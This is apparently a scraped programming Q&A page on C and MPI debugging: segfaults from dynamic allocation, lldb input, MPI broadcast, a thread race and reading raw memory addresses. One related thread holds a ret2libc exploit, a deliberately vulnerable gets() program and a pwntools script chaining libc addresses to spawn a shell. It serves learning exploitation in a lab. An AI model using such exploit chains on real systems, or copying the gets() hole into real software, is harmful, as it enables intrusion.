Dynamically allocating space causing error in MPI program - c

There is an MPI program to calculate the product of two matrices here :
https://gist.githubusercontent.com/kmkurn/39ca673bb37946055b38/raw/20ed8f7a7c078b82d12b9f7ef1390b9e9c67d626/mpi_mm.c
I used this exact code but instead of specifying the size of the matrix as a constant, I wanted to take them as input parameters. So I added the following code inside the main:
int N = atoi(argv[1]);
int M = atoi(argv[2]);
double(*a)[M] = malloc(sizeof(double[N][M]));
double(*b)[1] = malloc(sizeof(double[M][1]));
double(*c)[1] = malloc(sizeof(double[N][1]));
int NRA = N;
int NCA = M;
int NCB = 1;
compiled it with mpicc and ran with mpiexec -n 4 ./a.out and got the following error:
===================================================================================
= BAD TERMINATION OF ONE OF YOUR APPLICATION PROCESSES
= PID 4960 RUNNING AT DESKTOP-NHT8PTC
= EXIT CODE: 11
= CLEANING UP REMAINING PROCESSES
= YOU CAN IGNORE THE BELOW CLEANUP MESSAGES
=================================================================================== YOUR APPLICATION TERMINATED WITH THE EXIT STRING: Segmentation fault
(signal 11) This typically refers to a problem with your application.
Please see the FAQ page for debugging suggestions
What could be the reason for this? I am not sure what could be going wrong with just dynamic initialization of matrices.

Related

Having problem in Buffer Overflow(ret2libc) exploit

I was following a tutorial regarding bufferoverflow(ret2libc) attack and it failed due to unknown reasons. The C program I wrote is as follows:
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char** argv)
{
char buf[256];
gets(buf);
return 0;
}
and i compiled it so it so it has checksec as:
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
and the exploit i have written is:
from pwn import *
proc = process("./vuln")
junk = "A"*264
libc_base = 0x00007ffff7dee000
system_offset = 0x0000000000048df0
exec_offset = 0x00000000000cb7c0
exit_offset = 0x000000000003e600
binsh_offset = 0x18a156
system = str(base64.b64encode(p64(libc_base + system_offset)))
exit = str(base64.b64encode(p64(libc_base + exit_offset)))
binsh = str(base64.b64encode(p64(libc_base + binsh_offset)))
pop_rdi = str(base64.b64encode(p64(0x00000000004011bb)))
buf = junk + pop_rdi + binsh + system + exit
proc.sendline(buf)
proc.interactive()
But immediately after running the exploit it is giving me an error:
[+] Starting local process './vuln': pid 1595
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$
[*] Process './vuln' stopped with exit code -11 (SIGSEGV) (pid 1595)
[*] Got EOF while sending in interactive
Can someone please tell me what is the problem here, Thanks in advance.
Using base64.b64encode here is bad because it will encode the addresses and hide them from the machine that executes the code.
I didn't check well and there may be other errors, but the first thing to do is removing them and pass the machine the addresses of the parts.

How to input value when use lldb debug my code

When I debug my program with lldb, I set a breakpoint in the main function, why did it end directly? In addition, the terminal should wait for my input ...
func.c
#include "func.h"
void insert_head(pnode *phead,pnode *ptail,int i){
pnode pnew = (pnode)calloc(1,sizeof(node));
pnew->num = i;
if(phead == NULL){
*phead = pnew;
*ptail = pnew;
}else{
pnew->pnext = *phead;
*phead = pnew;
}
}
void print_list(pnode phead){
while(phead){
printf("%d",phead->num);
phead=phead->pnext;
}
}
main.cpp
#include "func.h"
int main()
{
pnode phead,ptail;//create new head ptial point to sturct
phead = ptail = NULL;
int i;
while(scanf("%d",&i) != EOF){
insert_head(&phead,&ptail,i);
}
print_list(phead);
return 0;
}
func.h
#pragma once
#include <cstdio>
#include <cstdlib>
//定义结构体
typedef struct Node{
int num;
struct Node *pnext;
}node,*pnode;
//头插法
void insert_head(pnode *phead,pnode *ptail,int i);
void print_list(pnode phead);
You can see the image , i want to figure out this,pls help me , thanks guys
In the example shown above, first of all, it looks like you didn't build your code with debug information (pass -g to your compiler invocations, and make sure you aren't stripping your binary). That's why when you hit your breakpoint at main, you only see some disassembly and not your source code.
If you had debug info, then when your program hit the breakpoint at main, lldb would show you that you are stopped at the beginning of main, before your program has called scanf to query for input. You should just be able to issue the continue command in lldb, and your program will proceed to the scanf call and wait for you input.
For instance, this (admittedly horrible code) works under lldb:
> cat scant.c
#include <stdio.h>
int
main()
{
int i;
int buffer[2000];
int idx = 0;
while(scanf("%d", &i) != EOF) {
buffer[idx++] = i;
}
for(i = 0; i < idx; i++)
printf("%d: %d\n", i, buffer[i]);
return 0;
}
> clang -g -O0 scanit.c -o scanit
> lldb scanit
(lldb) target create "scanit"
Current executable set to '/tmp/scanit' (x86_64).
(lldb) break set -n main
Breakpoint 1: where = scanit`main + 41 at scanit.c:8:7, address = 0x0000000100000e89
(lldb) run
Process 74926 launched: '/tmp/scanit' (x86_64)
Process 74926 stopped
* thread #1 tid = 0x71d134 , queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
frame #0: 0x0000000100000e89 scanit`main at scanit.c:8
5 {
6 int i;
7 int buffer[2000];
-> 8 int idx = 0;
^
9 while(scanf("%d", &i) != EOF) {
10 buffer[idx++] = i;
11 }
Target 0: (scanit) stopped.
(lldb) c
Process 74926 resuming
10 20 30 40 ^D
0: 10
1: 20
2: 30
3: 40
Process 74926 exited with status = 0 (0x00000000)
(lldb)
So that correctly fetched the input from the terminal while the program was running and provided it to the scanf call.
From what I can see, the cause of your confusion is that you didn't build your program with debug information, so when you stopped at your initial breakpoint, you didn't realize you just hadn't gotten to the call to scanf yet.
For your lldb ./test as per excellent #JimIngham remarks lldb can capture user input while the program executes (vs not while being stopped on a breakpoint for instance).
For more complicated programs with terminal UI separate terminal windows (one for lldb, one for your program) might be more convenient.
To use the latter approach either run your ./test program first in terminal where it wait on user input through scanf.
Run another terminal window and launch
lldb -n "test"
Which will attach to the running process based on its name.
Or alternatively you can also attach upon process launch
lldb -n "test" --wait-for
and in another terminal window
./test
This allow you to debug your main and do anything you want with your program (that includes providing user input).

Understanding broadcast operation mpi

I have an MPI program that was given to us that receives an integer and double as input from the user and have the processes announce their value that they receive.
For example:
user input = 7 10.1
Output:
Process 1 got 7 and 10.100000
Process 2 got 7 and 10.100000
.
.
I understand that each process will just have to announce the values that was given by user input through a single broadcast but the code seemed complicated that i couldn't understand the logic of it.
#include <stdio.h>
#include "mpi.h"
int main(int argc, char *argv[])
{
int rank; //rank of the process
struct {int a;double b;} value;
MPI_Datatype mystruct;
int blocklens[2]; //what is this?
MPI_Aint indices[2]; //what is this?
MPI_Datatype oldtype[2];
MPI_Init(&argc,&argv); //initialize MPI environment
MPI_Comm_rank(MPI_COMM_WORLD,&rank);
blocklens[0] = 1;
blocklens[1] = 1;
oldtype[0] = MPI_INT;
oldtype[1] = MPI_DOUBLE;
MPI_Get_address(&value.a, &indices[0]);
MPI_Get_address(&value.b, &indices[1]);
indices[1] = indices[1] - indices[0];
indices[0] = 0;
MPI_Type_create_struct(2,blocklens,indices,oldtype,&mystruct);
MPI_Type_commit(&mystruct);
while (value.a >= 0) {
if (rank == 0) {
printf("Enter an integer and double: ");
fflush(stdout);
scanf("%d %lf",&value.a,&value.b);
}
MPI_Bcast(&value,1,mystruct,0,MPI_COMM_WORLD);
printf("Process %d got %d and %lf\n",rank,value.a,value.b);
}
MPI_Type_free(&mystruct);
MPI_Finalize();
return 0;
}
I would appreciate if someone could give me a run through of how the code works as i find it really hard to understand it.
This code creates a MPI derived datatype so struct value can be broadcasted in a single MPI call.
This is IMHO a bad example since :
the offsetof() macro should be used to (directly) populate the displacements array (indices is a very poor choice here)
the predefined MPI_DOUBLE_INT datatype is a perfect fit (do not forget to swap a and b in the struct value definition)
as a matter of taste, I’d rather recommend you pass the values via the command line rather than reading them from stdin (this is very subjective, and from experience, you will avoid surprises)

C code stack corruption changing variable

I'm hoping that someone can help me out. I have not written much in C code in over a decade and just picked this back up 2 days ago so bear with me please as I am rusty. THANK YOU!
What:
I'm working on creating a very simple thread pool for an application. This code is written in C on CodeBlocks using GNU GCC for the compiler. It is built as a command line application. No additional files are linked or included.
The code should create X threads (in this case I have it set to 10) each of which sits and waits while watching an array entry (identified by the threads thread index or count) for any incoming data it might need to process. Once a given child has processed the data coming in via the array there is no need to pass the data back to the main thread; rather the child should simply reset that array entry to 0 to indicate that it is ready to process another input. The main thread will receive requests and will dole them out to whatever thread is available. If none are available then it will refuse to handle that input.
For simplicity sake the code below is a complete and working but trimmed and gutted version that DOES exhibit the stack overflow I am trying to track down. This compiles fine and initially runs fine but after a few passes the threadIndex value in the child thread process (workerThread) becomes corrupt and jumps to weird values - generally becoming the number of milliseconds I have put in for the 'Sleep' function.
What I have checked:
The threadIndex variable is not a global or shared variable.
All arrays are plenty big enough to handle the max number of threads I am creating.
All loops have the loopvariable reset to 0 before running.
I have not named multiple variables with the same name.
I use atomic_load to make sure I don't write to the same global array variable with two different threads at once please note I am rusty... I may be misunderstanding how this part works
I have placed test cases all over to see where the variable goes nuts and I am stumped.
Best Guess
All of my research confirms what I recall from years back; I likely am going out of bounds somewhere and causing stack corruption. I have looked at numerous other problems like this on google as well as on stack overflow and while all point me to the same conclusion I have been unable to figure out what specifically is wrong in my code.
#include<stdio.h>
//#include<string.h>
#include<pthread.h>
#include<stdlib.h>
#include<conio.h>
//#include<unistd.h>
#define ESCAPE 27
int maxThreads = 10;
pthread_t tid[21];
int ret[21];
int threadIncoming[21];
int threadRunning[21];
struct arg_struct {
char* arg1;
int arg2;
};
//sick of the stupid upper/lowercase nonsense... boom... fixed
void* sleep(int time){Sleep(time);}
void* workerThread(void *arguments)
{
//get the stuff passed in to us
struct arg_struct *args = (struct arg_struct *)arguments;
char *address = args -> arg1;
int threadIndex = args -> arg2;
//hold how many we have processed - we are unlikely to ever hit the max so no need to round robin this number at this point
unsigned long processedCount = 0;
//this never triggers so it IS coming in correctly
if(threadIndex > 20){
printf("INIT ERROR! ThreadIndex = %d", threadIndex);
sleep(1000);
}
unsigned long x = 0;
pthread_t id = pthread_self();
//as long as we should be running
while(__atomic_load_n (&threadRunning[threadIndex], __ATOMIC_ACQUIRE)){
//if and only if we have something to do...
if(__atomic_load_n (&threadIncoming[threadIndex], __ATOMIC_ACQUIRE)){
//simulate us doing something
//for(x=0; x<(0xFFFFFFF);x++);
sleep(2001);
//the value going into sleep is CLEARLY somehow ending up in index because you can change that to any number you want
//and next thing you know the next line says "First thread processing done on (the value given to sleep)
printf("\n First thread processing done on %d\n", threadIndex);
//all done doing something so clear the incoming so we can reuse it for our next one
//this error should not EVER be able to get thrown but it is.... something is corrupting our stack and going into memory that it shouldn't
if(threadIndex > 20){ printf("ERROR! ThreadIndex = %d", threadIndex); }
else{ __atomic_store_n (&threadIncoming[threadIndex], 0, __ATOMIC_RELEASE); }
//increment the processed count
++processedCount;
}
else{Sleep(10);}
}
//no need to do atomocity I don't think for this as it is only set on the exit and not read till after everything is done
ret[threadIndex] = processedCount;
pthread_exit(&ret[threadIndex]);
return NULL;
}
int main(void)
{
int i = 0;
int err;
int *ptr[21];
int doLoop = 1;
//initialize these all to set the threads to running and the status on incoming to NOT be processing
for(i=0;i < maxThreads;i++){
threadIncoming[i] = 0;
threadRunning[i] = 1;
}
//create our threads
for(i=0;i < maxThreads;i++)
{
struct arg_struct args;
args.arg1 = "here";
args.arg2 = i;
err = pthread_create(&(tid[i]), NULL, &workerThread, (void *)&args);
if (err != 0){ printf("\ncan't create thread :[%s]", strerror(err)); }
}
//loop until we hit escape
while(doLoop){
//see if we were pressed escape
if(kbhit()){ if(getch() == ESCAPE){ doLoop = 0; } }
//just for testing - actual version would load only as needed
for(i=0;i < maxThreads;i++){
//make sure we synchronize so we don't end up pointing into a garbage address or half loading when a thread accesses us or whatever was going on
if(!__atomic_load_n (&threadIncoming[i], __ATOMIC_ACQUIRE)){
__atomic_store_n (&threadIncoming[i], 1, __ATOMIC_RELEASE);
}
}
}
//exiting...
printf("\n'Esc' pressed. Now exiting...\n");
//call to end them all...
for(i=0;i < maxThreads;i++){ __atomic_store_n (&threadRunning[i], 0, __ATOMIC_RELEASE); }
//join them all back up - if we had an actual worthwhile value here we could use it
for(i=0;i < maxThreads;i++){
pthread_join(tid[i], (void**)&(ptr[i]));
printf("\n return value from thread %d is [%d]\n", i, *ptr[i]);
}
return 0;
}
Output
Here is the output I get. Note that how long it takes before it starts going crazy does seem to possibly vary but not much.
Output Screen with Error
I don't trust your handling of args, there seems to be a race condition. What if you create N threads before the first one of them gets to run? Then the first thread created will probably see the args for the N:th thread, rather than for the first, and so on.
I don't believe there's a guarantee that automatic variables used in a loop like that are created in non-overlapping areas; after all they go out of scope with each iteration of the loop.

How to loop and read content from a range of memory address

I'm new to C and I would like to read content from range of memory address
Assume that I have following range of address : 0x00065580 - 0x000655c0
this range get from command :
$ cat /proc/a_process_pid/maps | grep heap
00065580-000655c0 ...........heap
( Please see the hex dump image from above range )
I tried to using loop but have no luck ,( just like the think of a Java dev )
#include <stdio.h>
#define START_ADDR 0x00065580
#define END_ADDR 0x000655c0
int main(){
char *start = START_ADDR ;
char *end = END_ADDR;
for( char *i=start ; i <= end ; i++ ){
printf("%s",i);
}
return 0;
}
It generate error :
root#localhost:~# ./test
Segmentation fault (core dumped)
Please tell me what am I wrong and what I need to learn about ?
Modern operating systems use virtual memory: the memory addresses that a process sees are different from the physical addresses, and programs normally can't touch the memory that is owned by another process. You appear to be looking at a memory dump from one particular process, but address 0x00065580 does in reality correspond to a different physical address, e.g. 0x00123456. And inside your own program, address 0x00065580 will correspond to another physical address, e.g. 0x00589263. The operating system will ensure that none of the physical addresses that are used by the other program will be accessible from yours.
If your process is running as root, you can use system calls to indirectly access other processes' memory.
Here is a C++ program which will shed some light on how to print addresses (or data) for particular memory locations.
#include<iostream>
using namespace std;
int main()
{
int* arr = new int[10];
int *start = NULL;
int *end = NULL;
for(int i=0;i<10;i++)
arr[i] = i+1;
start = arr;
end = &arr[9];
for(int *start=arr;start<end;start++)
cout<<" "<<start;
cout<<endl;
system("PAUSE");
return 0;
}
I do not see any issue in your pasted code. But the problem is the START and END, i.e. the location of addresses you are using in your program. These locations does not contain any valid memory for that process hence you are forcefully asking to read data from some junk memory space resulting in SEGFAULT. Hope this helps.

Resources